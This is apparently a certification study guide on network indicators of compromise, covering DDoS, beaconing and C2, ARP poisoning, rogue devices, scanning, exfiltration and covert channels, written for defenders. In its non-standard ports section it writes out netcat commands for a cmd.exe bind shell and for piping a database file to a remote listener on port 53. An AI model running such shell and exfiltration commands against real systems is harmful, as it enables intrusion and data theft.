A comprehensive study guide covering network-based indicators of compromise including traffic spikes and DDoS, beaconing and C2 channels, irregular P2P communications, rogue device detection, port scans and sweeps, non-standard port usage, data exfiltration techniques, covert channels, and steganography.
Objective 1.2 — Analyze indicators of potentially malicious activity
1
Network IOC Overview
A network-based IOC (indicator of compromise) is observable evidence in network traffic, logs, or device behaviour that suggests a potential compromise, ongoing attack, or attacker presence. Network IOCs are used to build defences, guide threat hunting, initiate incident response, and support forensic investigations.
Traffic spikes vs. baseline
Beaconing / C2 heartbeats
Irregular peer-to-peer traffic
Rogue devices / APs
Port scans & sweeps
Non-standard port usage
Covert channel data in ICMP / DNS
Data exfiltration patterns
Key principle: No single network IOC is definitive on its own. A traffic spike could be a DDoS or a scheduled backup. A client-to-client connection could be malware or an authorised P2P app. Always correlate multiple IOCs and compare against your known baseline before drawing conclusions.
2
Traffic Spikes — DDoS, DRDoS & the Slashdot Effect
A traffic spike is any sharp increase in connection requests compared to an established baseline. Not all spikes are malicious — scheduled backups, Slashdot Effect surges, or peak business hours all produce legitimate spikes. The key question is always: where is the traffic going, and is it expected?
DDoS — Distributed Denial of Service
Multiple compromised hosts (bots/zombies inside a botnet) simultaneously send requests to overwhelm a service's network, processor, or memory resources. Traffic appears legitimate because it follows valid protocol patterns — the issue is volume. DDoS-for-hire services sell botnets from ~$35/month (220 Gbps, 6 minutes of attack time). Goal: survive the attack — most DDoS attacks last 5–20 minutes.
DRDoS — Distributed Reflection DoS
Attacker spoofs the victim's IP address and sends requests to many legitimate servers. Those servers reply (amplified) to the victim. Examples: ICMP ping broadcast amplification, DNS amplification (small query → large response), NTP amplification (one request → responses from last 600 contacted machines). Dramatically increases bandwidth delivered to victim.
DDoS IOCs to watch for
Incoming DDoS
Large unexpected traffic surge from external internet hosts. Excessive time-wait connections in load balancer state tables. High numbers of HTTP 503 (Service Unavailable) log events.
Your hosts in a botnet
Large unexpected outbound traffic from your network — your hosts may be zombies attacking others. Identify and remediate compromised hosts before your organisation becomes a source.
Slashdot Effect
Traffic crash from legitimate users: a small site becomes unexpectedly popular (Reddit, Twitter, major news coverage) and receives more legitimate traffic than it can handle. Not malicious — but looks identical to a DDoS in the logs.
Five DDoS mitigation strategies
1
Real-time log analysis to identify suspicious traffic patterns → redirect to black hole or sinkhole.
2
Geolocation + IP reputation filtering — block or redirect traffic from regions where you have no legitimate users.
3
Aggressively close slow connections by reducing server timeout values (e.g. 180s → 30s).
4
Caching and CDN backend infrastructure to offload processing across multiple servers.
5
Enterprise DDoS protection services (CloudFlare, Akamai) that sit in front of your infrastructure and filter attack traffic before it reaches you.
3
Beaconing & C2 Communication Channels
Beaconing is the process by which a compromised host periodically contacts a command-and-control (C2) server to announce its presence and receive orders. The beacon is effectively a heartbeat — "I'm alive and ready for commands." Without beaconing, a C2 server can't issue commands to its bots.
Beaconing patterns — regular vs. jitter vs. legitimate
Timeline — connection events over 60 minutes
Regular beacon
Fixed intervals → easy to detect by signature
With jitter
Random delay frustrates interval-based detection
Legit (NTP heartbeat)
Authorised — NTP / auto-update / cluster services also beacon
Exam tip: In exam scenarios, beaconing is usually shown as regular fixed intervals (every 3s, every 5s, every 15s, every day at midnight) because that's the simplest to demonstrate. In the real world, attackers use DGA, fast flux DNS, and jitter to evade interval-based detection. Know both.
Six C2 communication channels
IRC
Internet Relay Chat (legacy)
Early botnet C2 channel. Now widely blocked — most organisations have no legitimate need for IRC. Its use as C2 has declined as organisations block it. If you see IRC traffic, it's a strong IOC.
HTTP / HTTPS
Web protocols (most common)
Cannot be blanket-blocked — every business needs web access. Mitigation: break-and-inspect (intercepting proxy) at the network edge to decrypt and analyse HTTPS traffic before it leaves the network.
DNS
Covert and hard to block
DNS queries bypass many firewalls. Commands can be embedded in request or response packets. IOCs: same query repeated at intervals (bot check-in); unusually large or complex DNS records; TXT/MX/NULL record queries. DNS tunneling tools: dnscat2.
Social media
Lives-off-the-land
Real-world examples: bots checking LinkedIn for job title changes as a trigger signal; Twitter hashtags encoding commands. Effective because companies trust these platforms and can't easily block them.
Cloud services
Scalable, trusted
Attackers use Google App Engine, AWS Lambda, and similar platforms to host C2. No servers to maintain; reliable, scalable, and traffic blends with legitimate cloud use. Difficult to block without disrupting business operations.
Media / doc metadata
Hidden in file headers
Metadata embedded in PNG, JPEG, MP3, MP4 files can encode C2 commands. A bot receives a seemingly normal image file but parses its metadata to retrieve orders. Bypasses content inspection focused on file body.
4
Irregular Peer-to-Peer Communications
On most corporate networks, traffic flows from clients to servers. Direct client-to-client communication is unusual — and when it occurs, it should be investigated. Attackers use lateral movement and worms that spread peer-to-peer, often leveraging Windows SMB (port 445) to push executables from one host to another.
Normal: client → server (expected)
10.1.0.133 (client) ↔ 10.1.0.1 (server) Protocol: SPOOLSS (printer spool) Server sends print driver (MZ binary) to client who just connected to the print server. Normal — Windows auto-downloads printer drivers from print servers.
Suspicious: client → client (investigate)
10.1.0.249 (client) ↔ 10.1.0.133 (client) Signs: NetPathCanonicalization request → TCP three-way handshake → MZ binary transfer IOC: Two clients communicating directly, one pushing an executable to the other — indicative of worm propagation (e.g. Conficker 2008).
ARP poisoning — layer 2 peer-to-peer spoofing
ARP poisoning (ARP spoofing) redirects an IP address to an attacker-controlled MAC address. This causes traffic intended for a legitimate host to flow through the attacker's machine first (man-in-the-middle). Detection: excess ARP traffic (far more than normal), IDS alerts, or by inspecting the ARP cache manually.
Windows ARP cache inspection
C:\>arp -a
Interface: 10.1.0.133 --- 0x4 Internet AddressPhysical AddressType 10.1.0.100-11-22-33-44-55dynamic ← verify against known server MAC 10.1.0.25400-11-22-33-44-55dynamic ← same MAC as server? ARP poisoning!
# If two different IPs resolve to the same MAC address, ARP poisoning is likely in progress
5
Rogue Devices — Types & Detection
A rogue device is any unauthorised device or service (wireless access point, DHCP server, DNS server, etc.) on a corporate network. Rogue devices can enable unauthorised access, data theft, traffic interception, or internal attacks — whether planted intentionally by an adversary or connected innocently by an employee.
Network TAP
Physical device attached to cabling to capture packets. Under attacker control, it silently records all traffic on that segment.
Rogue WAP / Evil Twin
Wireless AP connected to your network (converts wireless to wired network access), or an evil twin mimicking your SSID to intercept wireless users as MITM.
Rogue server
Attacker sets up a server (as honeypot or rogue DNS/DHCP) to harvest credentials or redirect traffic. Can be a physical server or a virtual machine — VMs are undetectable by walking the room.
Unauthorised client
Personal laptop plugged into the network. Has webcam, mic, may carry malware, isn't patched. Even an authorised device becomes rogue when used in an unauthorised way (port scanning, SSH to servers, tethering phone).
Rogue software
Unauthorised application installed on a corporate machine. May include malicious DHCP/DNS servers, malware, or spyware. Must go through change management — download and install without approval = rogue.
Smart appliances / IoT
Printers, webcams, smart TVs, conference room AV systems — many run Linux with no patching cycle. Each one is a potential attack vector if connected to the corporate network.
Rogue device detection methods
Visual inspection
Physical walk-through of server rooms, switch racks, and network closets. Count devices — five switches yesterday, six today? Check for fake asset tags. Best for wired networks. Schedule monthly or quarterly.
Network scanning & host discovery
Enumeration scanner (Nmap) discovers hosts via banner grabbing and fingerprinting. Compare against baseline — any new devices that didn't go through change control are rogue.
Wireless monitoring
Scan for unknown or unidentifiable SSIDs in your office's wireless range. If you have two "CorpWifi" signals but only operate one AP, someone has set up an evil twin.
Packet sniffing & flow analysis
Identify unauthorised protocols or unexpected traffic sources. Port 80 traffic from a server you don't run a web server on? Someone may have set up a rogue web server inside.
NAC + IDS
NAC (Network Access Control) requires authentication (username/password or certificate) before network access is granted — no certificate = no access. IDS flags new unrecognised devices for analyst review.
6
Scans, Sweeps, Fingerprinting & Footprinting
Port scan
Single target enumeration
Enumerates the status of TCP and UDP ports on a given target. Tool: Nmap. Also identifies OS and service versions through fingerprinting. Use: determine what attack surface is exposed on one specific host.
Sweep
Multiple targets, one port
Scans a range of IP addresses for a specific port. Example: "Who on my network has port 80 open?" Produces a list of targets for deeper scanning. Faster but less detail per host.
Fingerprinting
One machine in depth
Identifies the type and version of an OS or server application by analysing its responses. Example: Nmap determines "Apache 2.4.51 on Linux" from a single host's port 80 response headers.
Footprinting
Entire organisation
Information gathering about the target organisation before an attack — its full network range, all exposed services, IP blocks, domain names. Fingerprinting = one machine; footprinting = the entire org.
How IDS detects scanning
IDS identifies scanning by detecting statistical imbalances in TCP handshake packets. A port scan sends many SYN packets but never completes the three-way handshake — so the ratio of SYN packets to SYN-ACK responses becomes heavily skewed. A normal network sending 100 SYN packets should receive roughly 100 SYN-ACK responses. A scanner sending 100 SYNs but only receiving 3 SYN-ACKs is probing closed ports.
Perspective check: Internet-facing resources will be scanned constantly — by security researchers, competitors, bots, and attackers alike. Scan activity alone is not cause for panic. Port scanning is not confirmation of an imminent attack. Investigate only if scanning is followed by exploitation attempts, or if it's coming from inside your network — which would be unusual and more concerning.
7
Non-Standard Port Usage, Shells & Reverse Shells
Port categories and non-standard usage IOCs
Well-known ports
0 – 1,023
Reserved by IANA for standard services. These are what you expect to see. Non-standard use of these (e.g. DNS traffic on port 80) is a major red flag.
Registered ports
1,024 – 49,151
Assigned to specific applications. Legitimate apps run here. Know the common ones — an unexpected service on a registered port should be investigated.
Dynamic ports
49,152 – 65,535
Should only be open briefly during connections, then close. A dynamic port that stays open for days or weeks is an IOC — may indicate a persistent malicious listener (C2, reverse shell).
Two non-standard port IOC patterns
IOC type 1
A well-known protocol used on the wrong port. DNS traffic on port 80 instead of port 53. HTTP traffic on port 153 instead of port 80. The protocol is normal — the port is wrong.
IOC type 2
Non-standard traffic on a well-known port. Data tunnelled through port 80 (HTTP) that isn't actually web traffic. Attackers use trusted ports to bypass port-based firewall rules.
Shell vs. reverse shell
Shell (bind shell)
Attacker opens a listening port on the victim machine. Remote host connects inbound to that port to get a command prompt.
Problem: inbound connections are blocked by most firewalls. Attacker can't reach a listener inside the organisation from outside.
Reverse shell (preferred by attackers)
Attacker opens a listening port on their own machine. The infected victim machine initiates an outbound connection to the attacker's listener.
Why it works: most firewalls allow outbound connections. The victim machine makes the connection — bypassing inbound firewall rules.
Netcat — creating shells and transferring files
netcat shell and file transfer examples
# Bind shell — set up a listener on the victim exposing cmd.exe on port 443 victim>nc -l -p 443 -e cmd.exe← listens on 443, executes cmd.exe for any connection attacker>nc 10.1.0.1 443← connects to victim, gets a C:\ prompt
# File exfiltration via netcat using DNS port (non-standard usage IOC) attacker>nc -l -p 53 > database.sql← listens on port 53, saves received data victim>type database.sql | nc 10.1.0.21 53 ↑ reads database.sql and pipes it to attacker's listener on port 53
# IOC: SQL data transmitted over port 53 (DNS) — mismatch protocol/port
Mitigations against non-standard port usage
Allowlist firewall rules
Configure firewalls to only permit explicitly whitelisted ports on ingress and egress. Application-layer firewalls can additionally verify that the traffic matches the expected protocol for that port.
Configuration management
Document which ports each server type is allowed to run. Configure host-based firewalls to enforce those per-host policies — e.g. web server allows only 80, 443, 22.
Protocol mismatch detection rules
Configure IDS/SIEM rules to alert on well-known ports carrying traffic that doesn't match the expected protocol. Port 53 carrying a SQL file = immediate alert.
8
TCP & UDP Port Reference — The 40 Most Important Ports
These are the 20 most commonly scanned TCP ports and 20 most commonly scanned UDP ports — the ones attackers probe most and defenders must protect. You will see port numbers in packet captures, firewall logs, and IDS alerts without labels. You must recognise them on sight.
Exam approach: You won't be asked "what is port X?" in isolation. You'll see port numbers in log snippets or scenarios and be expected to recognise what service is running, whether it's expected, and what the security implications are. RDP on port 3389 from an external IP at 3 AM = investigate immediately.
TCP ports — 20 most important
21
FTP
File Transfer Protocol — file transfers
22
SSH / SFTP
Secure Shell — encrypted remote access & file transfer
23
Telnet
Insecure remote admin — replace with SSH
25
SMTP
Outbound email sending
53
DNS (TCP)
Zone transfers only ★
80
HTTP
Unencrypted web traffic ★
110
POP3
Legacy mailbox access — mostly replaced by IMAP
111
RPCBIND
Unix/Linux RPC port mapper — dead giveaway for Linux server
135
MSRPC
Windows RPC services advertisement
139
NetBIOS-SSN
Windows file sharing (pre-Win2000 hosts)
143
IMAP
Internet Mail Access Protocol — modern email client
443
HTTPS
Encrypted web traffic — TLS tunnel ★
445
Microsoft-DS
SMB over TCP/IP — Windows file sharing (current) ★
993
IMAPS
IMAP over SSL/TLS
995
POP3S
POP3 over SSL/TLS
1723
PPTP
Legacy VPN — weak security, avoid
3306
MySQL
MySQL database connections
3389
RDP
Remote Desktop Protocol — Windows GUI remote access ★
Data exfiltration is the process by which an attacker moves data from inside a private network to an external destination. The attacker's purpose for gaining access — stealing credentials, selling customer data, ransomware preparation, espionage — almost always involves exfiltration as the endgame.
HTTP / HTTPS transfers
IOC: cloud upload to Dropbox / GDrive
Attacker uploads files via commercial cloud sharing services (Dropbox, OneDrive, Google Drive). Traffic blends with legitimate web use. Hard to detect without content inspection or DLP. Mitigation: DLP policy restricting uploads to unapproved services.
HTTP database requests
IOC: PHP request spike + large HTTP responses
SQL injection or similar technique to dump database records via HTTP. Easier to detect: look for a sudden spike in requests to PHP/script files, or unusually large HTTP response packets (database being dumped).
DNS tunnelling
IOC: atypical record types, oversized queries
Data encoded into DNS queries and responses — passes through most firewalls because DNS is essential and often uninspected. TXT record queries, unusually long domain names, repeated queries to the same domain at intervals. Tool: dnscat2.
Overt channels
IOC: unusual FTP, IM, P2P traffic
FTP, instant messaging, peer-to-peer, email — channels designed to transfer data, used maliciously. Detectable if these protocols are monitored or blocked. The channel itself is legitimate; the data being sent is not.
Explicit tunnels
IOC: atypical geographic endpoints
SSH or VPN tunnels to attacker-controlled endpoints. Detect by monitoring for endpoints in unusual geolocations — a VPN connection from your servers to a country where you have no employees is a strong IOC.
C2 channel ≠ exfiltration channel: An attacker may use DNS for C2 (beaconing/commands) but SSH for data exfiltration. Blocking DNS (port 53) stops the C2 but doesn't stop the exfil if the command to start exfiltrating was already received. Both channels must be identified and blocked simultaneously.
Best mitigation against data exfiltration: Strong encryption of data at rest. Even if an attacker successfully exfiltrates encrypted files without the key, those files are useless to them. Encryption is the last line of defence when all other controls have failed.
10
Covert Channels & Steganography
A covert channel is a communication path that sends data out of a network without triggering intrusion detection or data loss prevention systems. Covert channels exploit mechanisms your security controls were not designed to monitor.
Five covert channel techniques
1
Egress gap exploitation — Transmit data over a non-standard port that is not filtered by the outbound firewall. If outbound filtering isn't applied, anything can leave on any port.
2
Protocol header encoding — Data encoded and embedded into TCP/IP packet headers. ICMP echo reply payload carries encoded data; DNS TXT record carries encoded commands. IDSs not tuned to inspect these pass the traffic.
3
Packet fragmentation / sparse delivery — Data chunked across many small packets sent at different times. Evades signature analysis with short detection windows (30–60 seconds). Reassembling and inspecting the full stream reveals the data.
4
Hex obfuscation — Data transmitted as hex strings instead of ASCII characters. Sensors looking for ASCII signatures (e.g. "SELECT * FROM") miss the hex-encoded equivalent.
5
Encrypted tunnel — Data sent through SSL/TLS prevents content inspection unless a break-and-inspect device is deployed at the network edge to decrypt, inspect, then re-encrypt.
Covert channel types
Storage channel
One process writes to a storage location; another reads from it. The read-write split means the OS kernel doesn't associate the two processes as communicating. Used for local inter-process signalling.
Timing channel
One process alters a shared system resource (CPU load, network timing) so the change in response time signals information to a recipient. Example: sending Morse code via ping packet timing — even-second ping = dot, odd-second = dash. Extremely difficult to detect.
Steganography — hiding data in plain sight
Steganography is the practice of concealing data within another file — an image, audio file, video, or document — such that the hidden data is invisible to the human eye. Unlike encryption (which hides the meaning of data), steganography hides the existence of the data.
How it works
Text is converted to binary and used to slightly modify LSB (least-significant bits) of individual pixels in an image. A pixel that was #FF8844 becomes #FF8845 — imperceptible to the human eye, but the bit change encodes data. File size barely changes.
Why it evades DLP
DLP tools inspect outgoing files against known file signatures. A steganographic image matches a PNG file signature — the data inside is camouflaged as image content. The tool sees a normal image, not an exfiltration attempt.
Exam note
Steganography is not the most common real-world exfiltration technique, but it is tested conceptually. Know what it is, how it evades detection, and that it is not the same as encryption (no key required to decode — the tool itself decodes it).
Best mitigation for covert channels: Advanced intrusion detection systems and user behaviour analytics (UEBA) tools. Not foolproof — the attacker/defender chess match means these evolve continuously. As defenders add detection for one technique, attackers adapt to the next.
Exam
Quick Reference Cheat Sheet
Traffic spikes
Not always malicious — compare against baseline, check destination. DDoS = bot volume attack. DRDoS = reflection/amplification (ICMP, DNS, NTP). Slashdot Effect = legitimate surge. IOCs: excessive 503 errors, time-wait connections, large outbound from internal hosts (your hosts may be bots).
Beaconing
Infected host → C2 heartbeat. Regular intervals = easy detect. Jitter = random delay to frustrate interval detection. DGA + fast flux = rotating domains/IPs to evade blocking. Exam scenarios: fixed-interval beacons. Real world: jitter + DGA. Legit beacons: NTP, auto-update, cluster services.
C2 channels
IRC (legacy, block it). HTTP/HTTPS (can't block — use break-and-inspect proxy). DNS (can bypass firewall — inspect for unusual record types, repeated queries, large packets). Social media (LinkedIn job change = trigger). Cloud services. File metadata.
P2P / ARP IOCs
Client-to-client communication is unusual on corporate networks. IOC: MZ binary pushed from one client to another (worm/malware). ARP poisoning: two IPs mapping to same MAC in arp -a output, excessive ARP traffic. Use IDS for detection.
Rogue devices
TAP (packet capture). WAP / evil twin (wireless MITM). Server (credential harvesting). Client (BYOD or unauthorised personal laptop). Software (unapproved install). VMs (invisible rogue server). Smart appliances (IoT/unpatched). Detection: visual inspection, Nmap scanning, wireless monitoring, NAC, IDS.
Scans & sweeps
Port scan = single target, many ports (fingerprinting). Sweep = many targets, one port (footprinting). IDS detects: SYN:SYN-ACK ratio imbalance. Only authorised hosts should scan; whitelist their IPs in IDS rules. Internet-facing scanning is normal — don't panic.
Non-standard ports
IOC 1: known protocol on wrong port (DNS on 80). IOC 2: unknown protocol on known port (tunnelled data on 443). Dynamic ports (49152+) staying open long = malicious listener. Reverse shell: victim initiates outbound to attacker — bypasses inbound firewall rules. Tool: Netcat.
Port ★ priorities
TCP: 80 HTTP, 443 HTTPS, 445 SMB, 3389 RDP, 22 SSH, 53 DNS (zone transfers). UDP: 53 DNS (queries), 514 Syslog, 123 NTP, 67/68 DHCP. DNS uses both TCP (53 = zone) and UDP (53 = queries). 3389 from external IP = investigate immediately.
Data exfiltration
HTTP/HTTPS = cloud service uploads (Dropbox). HTTP database = SQL injection + large response packets. DNS tunnelling = dnscat2, TXT record queries. Overt = FTP/IM/email. Explicit tunnels = SSH/VPN to unusual geographic endpoint. C2 channel ≠ exfil channel — block both independently.
Covert channels
Egress gap. Protocol header encoding (ICMP data, DNS TXT). Packet fragmentation (sparse delivery). Hex obfuscation. Encrypted tunnel (TLS — break-and-inspect to detect). Storage channel = read/write split. Timing channel = response timing encodes data (ping Morse code). Steganography = data in image LSBs, evades DLP signature matching.